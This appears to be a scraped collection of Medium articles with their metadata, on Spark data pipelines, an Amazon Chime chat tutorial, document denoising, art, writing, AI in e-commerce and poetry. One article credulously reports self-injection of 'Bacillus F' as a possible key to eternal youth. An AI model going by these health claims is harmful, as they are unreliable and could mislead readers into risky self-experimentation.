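# Assumed, simplified binlog payload: {"op": "insert|update|delete", "after": {"id": ..., "amount": ...}}
schema = "op STRING, after STRUCT<id: LONG, amount: DOUBLE>"
changes = binlog.select(F.from_json("json", schema).alias("c")).select("c.op", "c.after.*")

# Step 3: merge each micro-batch into the target Delta table.
def upsert(batch_df, batch_id):
    target = DeltaTable.forPath(spark, "s3://my-lake/orders")   # assumed table path
    (target.alias("t")
        .merge(batch_df.alias("s"), "t.id = s.id")
        .whenMatchedDelete(condition="s.op = 'delete'")
        .whenMatchedUpdateAll(condition="s.op <> 'delete'")
        .whenNotMatchedInsertAll(condition="s.op <> 'delete'")
        .execute())

# Step 4: launch the streaming job.
(changes.writeStream
    .foreachBatch(upsert)
    .option("checkpointLocation", "s3://my-lake/_checkpoints/orders")
    .start())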
https://medium.com/acing-ai/orchestrating-change-data-capture-to-a-data-lake-283048656d98
['Vimarsh Karbhari']
2020-09-10 14:45:42.720000+00:00
['Machine Learning', 'Data Science', 'Artificial Intelligence', 'Data Engineering', 'Spark']
Add Chat Feature to Demo of Amazon Chime SDK React Component Library
Add Chat Feature to Demo of Amazon Chime SDK React Component Library dannadori Follow Nov 30 · 7 min read Note: This article is also available here.(Japanese) https://cloud.flect.co.jp/entry/2020/11/30/125920 In our last article, we posted a brief introduction to the Amazon Chime SDK React Component Library. At the time of writing, the latest update of this library, ver 1.5.0, added Chat-related components. I’m going to use it to add Chat functionality to an official AWS demo. Like this. Note: that this article is a bit complicated, using React coding. If you simply want to run the code, the URL of the repository is given at the end of this article, so you can get the code from there and run it. At First This time, we will add Chat functionality based on the demo provided by the official. First, make sure you have a working sample of ver 1.5.0, referring to the previous article. Approach Generally, the Amazon Chime SDK React Component Library provides React components as well as hooks and providers (Context APIs) that work behind the components to make it easier to use Amazon Chime’s features. With the addition of the Chat-related components, I was hoping that they would provide providers or hooks to enable Chat functionality, but unfortunately, they haven’t yet. This issue says that you should implement it yourself with data messages for real-time signaling. Please refer to my previous article on data messages for real-time signaling. So, I would like to implement a provider that uses data messages for real-time signaling by myself. RealitimeSubscribeChatStateProvider We will name the provider we will create as RealtimeSubscribeChatStateProvider. The following is a brief description of the content of the provider, in excerpts that we think are important. The entire source code can be found here. Call userealitimeSubscribeChatState() of this provider so that you can refer to the Chat features and data. Definition of State Define the State (Chat function and data) provided by userealitimeSubscribeChatState(). If you just want to create a simple Chat function, the following two variables should be sufficient. export interface RealitimeSubscribeChatStateValue { chatData: RealtimeData[] sendChatData: (mess: string) => void } The RealtimeData used in the interface is the actual data to be sent and received. In this article, we have defined the following data structure. export type RealtimeData = { uuid: string data: any createdDate: number senderName: string //<snip> } useRealitimeSubscribeChatState() The method to provide the above State is as follows: when creating a provider using the Context API, I think it’s almost formulaic, so I won’t describe it. export const useRealitimeSubscribeChatState = (): RealitimeSubscribeChatStateValue => { const state = useContext(RealitimeSubscribeChatStateContext) if (!state) { // handle exception } return state } Definition of Provider Sending and receiving data messages for real-time signaling is done by AudioVideoFacade. You can get a reference to this AudioVideoFacade with useAudioVideo() (1–1), and you can get the username with useAppState() (1–2). The user name can be retrieved with useAppState() (1–2). The Chat text data is managed by this provider using useState. (1–3) In (2–1), we define a data transmission function using data messages for real-time signaling. We call the method of audioVideo (AudioVideoFacade) to send the data. In this time, we specify “CHAT” because we can specify the topic (2–2). 
Also, since the sender can’t receive the sent data , you should add the sent data to the Chat text data after sending(2–3). useEffect registers (and deletes) a function for receiving data messages for real-time signaling (3–1), (3–2). The receive function itself just parses the received data and adds it to the text data of Chat, as shown in (3–3). export const RealitimeSubscribeChatStateProvider = ({ children }: Props) => { const audioVideo = useAudioVideo() // <----- (1-1) const { localUserName } = useAppState() // <----- (1-2) const [chatData, setChatData] = useState([] as RealtimeData[]) // <----- (1-3) const sendChatData = (text: string) => { // <----- (2-1) const mess: RealtimeData = { uuid: v4(), data: text, createdDate: new Date().getTime(), senderName: localUserName } audioVideo!.realtimeSendDataMessage("CHAT" as DataMessageType, JSON.stringify(mess)) // <----- (2-2) setChatData([...chatData, mess]) // <----- (2-3) } const receiveChatData = (mess: DataMessage) => { // <----- (3-3) const data = JSON.parse(mess.text()) as RealtimeData setChatData([...chatData, data]) } useEffect(() => { audioVideo!.realtimeSubscribeToReceiveDataMessage( // <----- (3-1) "CHAT" as DataMessageType, receiveChatData ) return () => { audioVideo!.realtimeUnsubscribeFromReceiveDataMessage("CHAT" as DataMessageType) // <----- (3-2) } }) const providerValue = { chatData, sendChatData, } return ( <RealitimeSubscribeChatStateContext.Provider value={providerValue}> {children} </RealitimeSubscribeChatStateContext.Provider> ) } GUI Next, I’m going to go over the part that displays the Chat screen. Here is another excerpt of what we think is important. Adding RealitimeSubscribeStateProvider Modify the DOM of MeetingView to allow the above created providers to be used in the conference room. Add a real-timeSubscribeStateProvider to the (1) part. This will allow the Chat feature to be used in the subordinate Views. const MeetingView = () => { useMeetingEndRedirect(); const { showNavbar, showRoster, showChat } = useNavigation(); return ( <UserActivityProvider> <StyledLayout showNav={showNavbar} showRoster={showRoster || showChat}> <RealitimeSubscribeStateProvider> // <--- (1) <StyledContent> <MeetingMetrics /> <VideoTileGrid className="videos" noRemoteVideoView={<MeetingDetails />} /> <MeetingControls /> </StyledContent> <NavigationControl /> </RealitimeSubscribeStateProvider> </StyledLayout> </UserActivityProvider> ); }; ChatView In (1), we get the chat data and a reference to the data sending function using the userealitimeSubscribeChatState() we created earlier. In (2–1) and (2–2), we use the Chat component of the Amazon Chime SDK React Component Library to generate the display part (more on this later). (3) calls the send function of the chat data. const ChatView = () => { const { localUserName } = useAppState() const { closeChat } = useNavigation(); const { chatData, sendChatData } = useRealitimeSubscribeChatState() // <---- (1) const [ chatMessage, setChatMessage] = useState(''); const attendeeItems = [] for (let c of chatData) { // <---- (2-1) const senderName = c.senderName const text = c.data const time = (new Date(c.createdDate)).toLocaleTimeString('ja-JP') attendeeItems.push( <ChatBubbleContainer timestamp={time} key={time+senderName}> // <---- (2-2) <ChatBubble variant= {localUserName === senderName ? 
"outgoing" : "incoming"} senderName={senderName} content={text} showTail={true} css={bubbleStyles} /> </ChatBubbleContainer> ) } return ( <Roster className="roster"> <RosterHeader title="Chat" onClose={()=>{closeChat}}> </RosterHeader> {attendeeItems} <br/> <Textarea //@ts-ignore onChange={e => setChatMessage(e.target.value)} value={chatMessage} placeholder="input your message" type="text" label="" style={{resize:"vertical",}} /> <PrimaryButton label="send" onClick={e=>{ setChatMessage("") sendChatData(chatMessage) // <---- (3) }} /> </Roster> ); } The rest you have to do is enable this ChatView to be displayed from a navibar. The display from the navibar is not essential in this case, and it contains several minor modifications, so I will not describe it. Please check the changes from the repository’s commit log. Run Now, let’s see how it works. If you type a message like this, you’ll see a message on your screen with the other person. For your own message (which has an outgoing variant attribute), it will be a blue speech bubble. For other messages, it will be a white speech bubble. You can toggle the display of the balloon’s tail (which, in cartoon terms, indicates where the balloon originates) by using the tail attribute, but you can’t change its direction. Otherwise, you can omit the time or add action buttons. Repository You can find the source code for this one in the “chat_feature” branch of the following repository You can launch it in the same way as the way we ran the demo in the previous article, so check out how it works. Finally This is a look at adding chat functionality to the official Amazon Chime SDK React Component Library demo. Although I had to touch the raw Amazon Chime SDK a bit, I was able to create a chat GUI that was consistent with the other components without too much effort. In addition to the chat function introduced here, the following repositories provide a version with a whiteboard function. Also, Cognito integration and virtual backgrounds are implemented in the following repositories. Virtual Background Whiteboard
https://medium.com/swlh/add-chat-feature-to-demo-of-amazon-chime-sdk-react-component-library-9379f6e43e58
[]
2020-12-13 06:48:39.032000+00:00
['JavaScript', 'React', 'AWS', 'Videoconference']
The 3.5 Million-Year-Old Bacteria That Could Be the Answer to Eternal Life
The 3.5 Million-Year-Old Bacteria That Could Be the Answer to Eternal Life Are we meant to live eternally? Ancient bacteria from 3.5 million years ago also known as Bacillus F strain (Source: MIMS) For centuries, humans have been in the look for a source of eternity or a potion that can bring you back to your youth. Many legends and stories from ancient histories most probably inspired by witches show the possibility of becoming younger. In our philosophy, we see aging and dying as a natural phenomenon that is meant to be the way it is. However, some people are simply thirsty for eternal life. So much that they would even risk injecting themselves with this bacteria. Over the 21st century, there have been two recorded cases, of people injecting themselves with this bacteria as well as claiming that they are feeling younger and healthier. But before we go into these cases, we must have a look at what does this bacteria actually presents itself to be as well as it’s believed origin. Bacillus F This bacteria, known as Bacillus F was discovered in 2009 by researchers from Mammoth Mountain in the northern Siberian region of Yakutsk. From the analyses done by the University of Moscow, the bacteria seems to originate from around 3.5 million years ago, around when mammoths were alive. The bacteria has been closely studied and from the read on the DNA it presented, it seemed to have the potential of giving the injected organism longevity of life and an increase in fertility. The first organism to be tested with the bacteria was a couple of mice. The results were quite clear, all the mice that had been injected with the bacteria presented a longer lifespan. What is even more interesting is that the mice were also still fertile at a very old age. Epidemiologist Viktor Chernyavsky, who took part in the study mentioned that the bacteria gives out biologically active substances during its long life cycle or as long as the organism keeps it alive. As an expert, Chernyavsky had positively confirmed that the bacteria did give longevity within mice as well as enhanced the fertility within the mice tested. The first person to be injected with the bacteria Even if the tests showed that the bacteria does not harm the mice of an organism, it still was considered dangerous to have it introduced into a human organism, at least until more research was done. However, someone became impatient and wanted to know if this was the “elixir of life” as it was nicknamed by some of the scientists within the field. Anatoli Brouchkov (Source: Vice) Anatoli Brouchkov was from the department of geocryology, the department which focuses on the study of glacier regions and regions that have been permanently frozen. The scientist wanted to know the truth about the bacteria so bad that he injected himself with the bacteria with no permission from his higher-ups. Brouchkov knew that the bacteria wasn’t going to harm him as it can be found in the water from where it has been extracted in Siberia. This region has some secluded villages from which people have gathered and consumed the same water infested with the bacteria for years without causing them any harm. In an interview with Jordan Pearson from VICE, Brouchkov mentioned that the bacteria never affected him in a negative way, only positive. He mentioned that he wasn’t getting younger from a physical appearance, but he was feeling less tired as if he was younger and much healthier. 
We all know that with age, it is common not only to get tired much quicker but also to get sick more often. Besides all this, the most interesting claim that Brouchkov made was that he hadn't suffered from any sort of sickness or illness for more than two years since injecting himself with the bacteria. Although this bacterium is quite primitive for its age, its biological mechanism is extremely complex, making it very difficult for scientists, even with state-of-the-art technology, to understand the way it affects the organism it inhabits. Brouchkov ended his media appearance by stating that he truly believes the Bacillus F bacteria is the key to immortality. Besides this bacteria, there are many others that have been in a state of permafrost for hundreds of thousands of years with remarkable complexity. Many scientists believe these bacteria to have been the cause of our ancestors' strong immune systems and long lifespans. Another person taking the "elixir of youth" A more recent case was recorded in 2017 by a German actress known as Manoush. The only difference, in this case, is that Manoush took more doses over a period of three months. Since 2015, the research team from the University of Moscow had been able to unlock the DNA code of the bacteria, gaining even more information on its longevity-related abilities, but also confirming that the bacteria can live forever. Photo of Manoush and injection with the bacteria, 2017 (Source: Daily Mail) She claims that since taking the injections she has not only felt younger but is getting younger from a physical perspective. The idea of getting younger physically is a bit more difficult to believe in her case, due to all the plastic surgeries she had undergone in the previous years, but there is still a possibility from a scientific point of view. The actress also mentioned that her skin feels much softer and, most importantly, that she used to get hay fever every year (something common in many people). Since taking the bacteria she hasn't had hay fever anymore; in fact, no type of illness or sickness, just like in Brouchkov's case. Scientists asked for blood samples from her every month during the three-month period she injected herself with the bacteria. She has the desire to live until the age of 100 in a "fully functional body". As there are no reported adverse effects from the injections with Bacillus F, she continues taking the bacteria.
https://medium.com/history-of-yesterday/the-3-5-million-year-old-bacteria-that-could-be-the-answer-to-eternal-life-a98e7c693759
['Andrei Tapalaga']
2020-12-25 21:02:41.238000+00:00
['Health', 'History', 'Science', 'Life', 'Medicine']
Denoising Noisy Documents
Numerous scientific papers, historical documents and artifacts, recipes, and books are stored on paper, be it handwritten or typewritten. With time, the paper tends to accumulate noise and dirt through fingerprints, weakening of paper fibers, coffee/tea stains, abrasions, wrinkling, etc. There are several surface cleaning methods used for preservation and cleaning, but they have certain limits, the major one being that the original document might get altered during the process. I, along with Michael Lally and Kartikeya Shukla, worked on a data set of noisy documents from the UC Irvine NoisyOffice Data Set. Denoising dirty documents enables the creation of higher-fidelity digital recreations of original documents. Several methods for denoising documents, like Median Filtering, Edge Detection, Dilation & Erosion, Adaptive Filtering, Autoencoding, and Linear Regression, are applied to a test dataset and their results are evaluated, discussed, and compared. Median Filtering Median filtering is the simplest denoising technique and it follows two basic steps: first, obtain the "background" of an image using median filtering with a kernel size of 23 x 23, then subtract the background from the image. Only the "foreground" will remain, clear of any noise that existed in the background. In this context, "foreground" is the text or significant details of the document and "background" is the noise and the white space between document elements.
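For readers who want to try the median-filtering baseline described above, a minimal Python/OpenCV sketch follows. The file names are placeholders and the 23 x 23 kernel simply mirrors the description in the text; this is an illustration of the approach, not the exact code used in the project.

# Minimal sketch of the median-filtering baseline (file paths are placeholders).
import cv2
import numpy as np

# Load the scanned page as a single-channel grayscale image.
img = cv2.imread("noisy_page.png", cv2.IMREAD_GRAYSCALE)

# Step 1: estimate the "background" with a large median filter (23 x 23 kernel, as above).
background = cv2.medianBlur(img, 23)

# Step 2: subtract the page from its estimated background; text is darker than the
# background, so the difference is large exactly where the foreground text sits.
diff = background.astype(np.int16) - img.astype(np.int16)
foreground = np.clip(diff, 0, 255).astype(np.uint8)

# Invert so the text is dark on a white page again, then save the cleaned result.
cleaned = 255 - foreground
cv2.imwrite("cleaned_page.png", cleaned)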
https://towardsdatascience.com/denoising-noisy-documents-6807c34730c4
['Chinmay Wyawahare']
2020-07-01 06:10:04.068000+00:00
['Machine Learning', 'Computer Vision', 'Data Science', 'Neural Networks', 'AWS']
Questioning Things
I’ve long been a fan of the artist Grayson Perry. In my opinion he speaks a lot of sense, and has a great ability to make art seem more accessible. But I’ve gained even more of an appreciation recently. Mainly because I finally got round to reading his book — ‘Playing to the Gallery’. In it he debunks a lot of myths about the art world, what counts as art, and ways to view it. He also talks about the role of the contemporary artist. And in doing so there’s one thing which really stuck in my mind. He said; “my job is to notice things that other people don’t notice” It likely struck a chord, because ‘noticing things’ is an inherent character trait of strategists. So, it kind of goes with the territory. But it’s also because it highlighted one of the big reasons why I’m drawn to certain artworks over others. And that’s because of the artist’s ability to successfully notice, reframe and reflect the cultural psyche in a way that’s easy to understand and relate to, and, at best, completely change the way that you see something. So while noticing things is one thing, a large part of how impactful a piece of work is in how well it effectively communicates these otherwise ‘unnoticed’ things. How much it challenges, questions and reframes existing ideas. And importantly how much it resonates. This is as true of art, as it is of any kind of visual communications. But noticing, and communicating the most useful or relevant insight, or idea is easier said than done. It’s also somewhat of a strategist’s holy grail. So this got me thinking. How do artists notice things? And what, if anything, can we can learn from that? Noticing starts by asking interesting questions. And art is a great lesson in how to ask. As Ai Weiwei said: “I always think art is a tool to set up new questions. To create a basic structure which can be open to possibilities is the most interesting part of my work…” The ability to ask questions is one of the great powers of art. Both in terms of output (the idea or assumption the artist is questioning with their work) but also in terms of input (what kinds of questions they ask in the first place, and what possibilities it opens up). Asking a good question can make the difference between a great work and a flop. A mediocre piece, and a piece which stops you in your tracks. A piece which invites new conversation, and lays the path for things to come. The ability to ask questions is also a key part of a strategist’s toolbox — from questioning the brief (‘what problem are we trying to solve?’) to interviewing stakeholders and audiences to questioning the usefulness of an insight or idea. So, I started to look at how art asks questions, to see how that could help me in my day-to-day role. And in doing so I found three distinct themes that consistently crop up: Question what you see Question how you see Question what isn’t being seen Three powerful questions to ask when approaching any new challenge or client brief. Let’s unpack that a bit further. In order to ‘notice’ the interesting things, the ‘things that others don’t notice’, it’s important to look beyond the obvious. To forget what you know, and look at things through a fresh lens. To question what you see. Artists are masters of this. They constantly challenge themselves and their audience to forget their assumptions. Deliberately playing with perceptions of reality, to reframe the way that something is seen. The work of conceptual artist Joseph Kosuth is a prime example of this. 
He often commented on the gap between language, image and meaning in his work. ‘One and Three Chairs’, for example, simultaneously showcases a physical chair, a photograph of a chair and a written definition of a chair. On the surface all three chairs represent the same idea (the chair), yet are not the same at all. It’s a great lesson in not taking things at face value. And by stating the ‘obvious’ he successfully create the kind of ‘aha’ moment that leaves a lasting impression. When it comes to strategy, stopping to question what you see is key. Asking for example — What is the real question in the clients brief? What’s the real problem we’re trying to solve? and is what people say really what they mean? But it’s equally useful to question how you see. As Kosuth’s work shows — it’s important to be aware of our own filtering process (i.e. how we instinctively see things). But it’s also important to be aware of the filtering process which is happening all around us. So while Kosuth draws attention to the nuances of interpretation and assumption, he equally questions how something is represented impacts how it is seen. In part, this comes down to context. In art, as in marketing, context is critical. The format, time and surroundings through which an idea is delivered can completely shift its meaning, impact and relevance. So it’s pretty useful to consider when thinking about how to communicate the story that needs to be told. Christian Marclay’s mesmerising and award winning video piece ‘The Clock’ highlighted this all too well. Excerpt from ‘The Clock’ via YouTube In it he stitched together thousands of video clips of clocks, from film and TV history, and played them out in real-time over 24 hours. Taking the clips in isolation, he makes tiny ‘unnoticed’ moments the centrepiece. And by editing out complexity completely shifts the narrative. Making you consider the films, and the concept of time in a whole new way. As Paul Klee said — “Art does not reproduce the visible; rather, it makes visible”. And Marclay’s piece does a brilliant job of doing just that. So, finally, and importantly, as Klee reminds us - question what isn’t being seen. One of the great roles of art is to unlock, comment and shape culture. A lot of the time this involves, not just questioning what is in plain sight, but what is hidden from view. The Guerrilla Girls offer just one example of this. Coined ‘the conscience of the art world’ they are a group of anonymous feminist activist artists that “wear gorilla masks in public and use facts, humor and outrageous visuals to expose gender and ethnic bias as well as corruption in politics, art, film and pop culture”. As they say, “… we undermine the idea of a mainstream narrative by revealing the understory, the subtext, the overlooked, and the downright unfair”. Guerrilla Girls Images and Posters 1985–2018 via YouTube Questioning what isn’t seen, or noticed, is the core theme of their work. But it’s also one which has the power to create real cultural change. Seeping into mainstream culture, since 1985 they have tirelessly campaigned for change. Inspiring countless activist-artists and fans as they go. Questioning what isn’t being seen, or said, and making it visible is at the heart of any truly insightful piece of work. But when it comes down to it a lot of the most powerful work has an authenticity to it that’s truly relatable, meaningful, and memorable. It comes from expressing a central belief that is true to who the artist is. 
And creating a genuine connection with the person who’s viewing it. And when they ask the right questions they have the power to capture attention, shift perceptions, and, ultimately drive behavioural change. When it comes to working out the most useful way forward for brands, there’s something that can be learnt from that. Question what you see, Question how you see it, but importantly, Question what isn’t being seen. Often that’s where the most important messages lie.
https://medium.com/a-strategists-guide-to-art/questioning-things-b7aba5253828
['Harriet Kindleysides']
2020-11-12 10:13:58.308000+00:00
['Brand Strategy', 'Marketing', 'Strategy', 'Creativity', 'Art']
5 Better Things to Do Instead of Staring at a Blank Page
Photo by Alessio Linon Unsplash 5 Better Things to Do Instead of Staring at a Blank Page When you’re stuck, take a break. Every writer feels stuck every once in a while. The words don’t seem to come up, and the few that do simply do not fit together. Your thoughts are either muddled or non-existent. Yet, you persist. You stare at the blank page, commanding your brain to come up with something, but it’s useless. Writing is something that’s just not happening for you today, and forcing it might actually make your writer’s block worse. Here’s 5 better things for you to do than insist on staring at that blank page: Go for a walk Walking is an effective way to relieve stress and boost creativity. Charles Dickens and Jane Austen are only a few of many writers known to have enjoyed long walks on a frequent basis. There’s something about the repetitive, rhythmic movements of walking that induces a meditative state. Recently, many authors’ instinctive preference for walking to induce creative output has been veryfied by science. Stanford researchers have found that “a person’s creative output increased by an average of 60 percent when walking.” (Source) A 60% increase in creative output is nothing to sneeze at. Going for a walk offers the added advantage of taking your eyes off the screen for a few minutes. It forces you to take a look at the world around you, and that alone might offer you the breakthrough you’ve been hoping for. Exercise While walking is a form of exercise, you can go one step further and do a more intense workout, such as running, biking, swimming, weightlifting. Exercising offers many benefits in improving cognitive function, not to mention your overall health. For me, an intense workout is the best form of meditation. While I can still “write in my head” while walking, when I go on a run my mind actually clears of all thought for a few minutes, and that creates the right mindset for welcoming new ideas. Post exercise, there’s a blissful exhaustion that makes me feel completely renewed and ready for another writing session. Talk to a friend Talking to a friend forces you get out of your own head for a few minutes. It’s easy to mistake isolating yourself with fostering a creativity-friendly environment. While writing is indeed a lonely occupation, sometimes breaking out of isolation is exactly what you need to get out of a creative rut. Talking to a friend brings you a new perspective about life. It reminds you that your blank page with its blinking cursor are not all that matters in the world. There are people out there who have other problems, other projects, other sources of joy. Reminding yourself of that every once in a while shifts your perspective and unlocks new ideas. Getting in touch with someone else’s reality helps you understand how you’ve blown your own creative rut out of proportion by focusing on it exclusively. Play — by yourself, with your kid, or with your pet “Play brings joy. And it’s vital for problem solving, creativity and relationships.” — Margarita Tartakovsky, M.S. We tend to think of play as only for children, but the reality is that adults benefit from play just as much. If you’re playing by yourself or with friends, try to pick something that doesn’t involve the use of screens, to give yourself a break from that. If you’re a parent, enjoy the opportunity to play with your kid. Children are not familiar with all the rules of the world yet, so they are less burdened by constraints on creativity. 
Ever seen a child paint a picture in which the grass is pink and the dog, green? Sure, grass isn’t pink in the “real world, “ but why can’t the grass be pink and the dog green in her world? When you get immersed in play with children, you begin to see things in an entirely new perspective. You become aware of your own arbitrary rules, and start to question yourself, why can’t things be different? If you’re not a parent yourself, play with a niece, a young cousin, or your friend’s kids (with permission and parental supervision, of course), or play with your pets. Pets are not the same as children, but you’d be surprised at all the creative ways cats and dogs play when you give them the freedom to be creative. My dog is always surprising me with how she choses to play with her toys — and with the stuff she thinks of as her toys (like my socks, or the toilet brush). If you don’t have a pet, you can ask a friend to let you play with theirs— most pet owners would appreciate the extra hand (I know I would), and there are plenty of animal shelters that allow volunteers to spend time playing with the animals. (Side note: always be careful letting children and animals play together. Make sure you know both the child and the animal well, and be careful to prevent any accidents. Your dog biting the neighbor’s kid is not going the outcome you want.) Cook Cooking is an excellent option to get your eyes off a screen and your hands into something tangible. As you focus on following a recipe, on measuring and preparing the right ingredients, on minding the stove and the oven so you don’t burn your food to a crisp, you’ll find that your mind contemplates ideas in the background, much like when walking or meditating. It doesn’t matter how skilled you are, you can always find a recipe that’s right at your level, besides, part of the fun of cooking is improving your skills and trying new things. If you’re a beginner, don’t put too much pressure on yourself to make something perfect: allow yourself to make mistakes. Embrace messing up as part of the process. When you’re stuck, get your mind out of writing Many writers mistakenly believe there’s only one solution to writer’s block, which is to push through, or to seek inspiration in writing-related activities, such as doing writing exercises or reading, but that’s not exactly true. In writing, there’s a time to push through, and a there’s a time to step away. With practice, you can easily identify the difference between these two moments. If if you suspect you’re stuck beyond the point where pushing through can help, step away from the computer. Turn your brain off of “writing mode,” release it to think of other things — or to simply not think at all. You’ll be surprised at what your brain can come up with after taking a break like that.
https://medium.com/a-life-of-words/5-better-things-to-do-instead-of-staring-at-a-blank-page-d1c4edf75ece
['Renata Gomes']
2020-07-15 21:01:44.645000+00:00
['Self', 'Writing Tips', 'Creativity', 'Writing', 'Self Improvement']
Top 5 Use Cases of AI in eCommerce
When Apple introduced its first iPhone — it was literally a shift in the paradigm of what we always viewed phones to be. Since then, there have been several significant evolutions in technology, but nothing compares to the biggest of them all — Artificial Intelligence. Don't agree? AI is having a bearing on almost every conceivable thing, and I suppose I don't even need to elucidate on the broad applications of this incredible new domain. Naturally, it was about time the benefits of AI were applied to the most lucrative business of the 21st century — eCommerce. Almost every significant step of commerce over the internet can be transformed by implementing AI. Every significant step, like visiting the retailer's website, adding products to the cart, placing an order, and even checkout, can be automated using the capabilities of AI. In this article, I will try to shed some light on the practical and significant use cases of AI in eCommerce and how your eCommerce business can leverage it right now. There seems to be a lot of confusion on the subject of AI in eCommerce, so let's put an end to this discussion once and for all, shall we? 5 Use-Cases of AI in eCommerce 1. Better Search Results It has been observed that customers end up abandoning their purchase because the product results displayed often turn out to be irrelevant. Through AI, organizations are trying to display customer-centric search results that are relevant to the customer's actual ask. eCommerce websites are increasingly leveraging NLP (Natural Language Processing) and image recognition to better comprehend user language and produce better product results. Yandex, a popular search engine, successfully implemented advanced applications of NLP and deep learning to optimize future searches with the help of data from previous searches. This turned out to be a massive success, as they were able to increase their click-through rates by almost ten percent. Clarifai is trying to improve eCommerce by building smarter applications that can see the world as people do. In their words, "Artificial Intelligence with a Vision." These applications enable developers to build more intelligent apps and at the same time empower businesses by providing a customer-centric experience. A demonstration of how Pinterest Lens works. Pinterest is partnering with eCommerce stores for its new offering, Pinterest Lens, to find matching items in the store directly from their image on Pinterest. This is great because people often abandon their search when they aren't able to find the relevant product. Developments such as these are not just helping businesses generate better revenues, but are also shortening the customer's journey. 2. Shopping Experience Level 1001! How do you enhance the user's shopping experience? Make it as real as possible! If you want to understand just how much Google knows about you, go check out your Google Maps Timeline! The devices that you use collect and store a ton of information about you. This data is extremely valuable, as the right type of information can enrich and improve your shopping experience. Deep learning and machine learning technologies are able to utilize the smallest piece of data.
For instance, even the hover that you made over a product is analyzed and evaluated to understand the likelihood of you buying that product. In practice, this personalization helps deliver images of related products, enticing offers related to the product, alerts related to that product, and dynamic content that alters according to demand and supply. AI engines such as Boomtrain acts as a bolt-on with your existing customer channels and helps businesses analyze how customers are interacting online. It also provides a unified view across all devices, monitoring and analyzing performances across different platforms. Companies like Criteo, are assisting Internet retailers to serve personalized online display advertisements to consumers who have previously visited the advertiser’s website. Through cross-device advertising, they are able to engage shoppers wherever they are online with premium-placed ads across desktop, mobile and social. AI is assisting in generating deep and relevant insights of data by analyzing and scanning through terabytes of data to efficiently predict human behavior. This scale of intelligence helps deliver a personalized shopping experience for the end-user. 3. Curbing Fake Reviews There’s a massive insurgence of fake reviews aimed at tarnishing the ratings of a good product. These reviews not only makes good products rank below but also cost companies billions of dollar. These stats are absolutely insane! Customer reviews are an integral part of the sales cycle. 87% of customers trust what they read without the blink of an eyelid. The last couple of years have seen a surge in talks around this subject and has consequently impacted the way customer perceive the information they encounter online, even if it is ostensibly written by a credible source. Artificial Intelligence is increasingly being deployed to analyze user reviews. For instance, Yelp has deployed a sentiment analysis technique to classify their review ratings. Through this technique, they organize the information into different data sets like business_id (ID of the business being reviewed), date (Day the review was posted), review_id (ID for the published review), stars (1–5 rating for the business), text (Review text), etc. On similar lines, Facebook has come up with its AI solution “fastText” for text classification and create supervised as well as unsupervised learning algorithms to obtain vector representation for words. 4. Sales Forecasting Earlier only God or Charles Xavier could have read your mind — but now — AI can too! Try and fathom an alternate reality where all your marketing efforts and expenditures are targeted only where the customer is likely to make a purchase. Your conversion rate will be at an all-time high, and you won’t waste your capital on customers who won’t buy. Being able to foretell how much of a given product will sell by a specific date will enable shop owners to stack up on inventory more efficiently, and simultaneously eliminate large sums of undesired cost. It is especially valuable for industries dealing with perishable products, which include not only groceries but also tickets of concert and transportation — anything that costs money when unsold. Also Read: How to build an awesome Ecommerce App Sounds too good to be true, right? AI solutions can gather historical data about past purchases and help your sales team better derive conclusions and make decisions. 
Besides, you won’t even need to sell your arms and legs to afford this either as these solutions are easily deployable, even by organizations with smaller budgets. Employing AI, businesses were able to derive relevant conclusions like – Suggesting products that should be promoted on a particular date Identify popular products that are making good sales Predicting what customers are likely to purchase in advance Determining the highest price a customer will pay for your product Targeted promotions Reduce fraud Improve supply chain management Enhance business intelligence Make the most money on your sales 5. Chatbots to the Rescue It might be so hard for you to feel special amongst an ocean of 7 Billion, right? Well, eCommerce websites are adopting chatbots to make you feel special. Companies are increasingly deploying chatbots to improve customer service & satisfaction. Go ahead and browse any ecommerce site, a little chatbox will pop-up asking you what you want to make a purchase of. Once you enter your requirements, you get filtered results specific to your taste. Let us list some benefits of deploying chatbots: Chatbots have increased customer conversion tremendously by reducing the labor for lazy buyers . . We have come so far from the time when chatbots offered just customary replies. Now they have become intelligent beings who understand and tackle a range of issues that they were earlier incapable of. who understand and tackle a range of issues that they were earlier incapable of. It is vital to provide real-time support to online shoppers as a recent study found that almost 83% of online shoppers need assistance while shopping and chatbots make it possible to provide real-time support. while shopping and chatbots make it possible to provide real-time support. Chatbots also provide a more personalized experience for consumers. Compared with social media, chatbots can make conversations more interactive and engaging. They increase the sales figures by up to 40%. for consumers. Compared with social media, chatbots can make conversations more interactive and engaging. They increase the sales figures by up to 40%. Deploying chatbots helps to collect feedback more efficiently. Additionally, it can make it easier to track purchasing patterns and consumer behavior. Chatbots can provide efficiency, that too at an affordable price. Live support can be quite costly with limited work hours. Chatbots automate the process and can operate 24/7. Chatbots are gaining ground. Apart from potentially changing the industry, implementing a chatbot can be a good marketing campaign. Any company that wants to stay ahead in the race needs to follow this trend. Discover Latest Jobs in Bots, NLP, AI, ML, NLU & More
https://medium.com/gobeyond-ai/top-5-use-cases-of-ai-in-ecommerce-88c9b8d58bc7
['Mayank Pratap']
2020-02-24 13:11:46.912000+00:00
['AI', 'Artificial Intelligence', 'Ai Development', 'Ai In Ecommerce', 'Ecommerce']
The Tragedy Of Poetry Appreciation
A poetry appreciation class is to poems what applesauce is to apples. We eat applesauce at room temperature, no chewing required, and in a mouth that breeds sadness. Similarly, we teach poetry appreciation in tame, extra-credit, cage-like places where eyes dart for the clock, pleading how much longer? Applesauce is a consolation prize. It is a bland, formless, disappointing mush that they once served in small white bowls with thin green stripes around the edges in elementary schools. To be clear, apples themselves are delightful, delicious, succulent gifts from the happiest gods. They come in thousands of varieties. My taste buds dance the Bossa nova in anticipation of sinking my teeth into one of those magnificent manifestations of nature's bounty. But let's talk about poems, how those little engines of magic pump their ideas, feelings, and wisdom deep into broken hearts and souls' infrastructure. Let's talk about how even well-meaning poetry appreciation classes strain the muscle, fiber, and power from poetry. Stripping away its lightning, its rolling thunder, its winds and storms and aching hearts. Why can't we just let poetry appreciation simply slip away like applesauce? It may still exist in a faraway tepid and tasteless cafeteria, but thanks to a merciful God, we no longer have to eat it.
https://medium.com/literally-literary/the-tragedy-of-poetry-appreciation-39ba085b7f32
['Dale Biron']
2020-09-25 05:32:57.058000+00:00
['Creativity', 'Writing', 'Poetry']
How I Built Grotesk, a React Component (and CSS Library) That Makes Web Type Simple
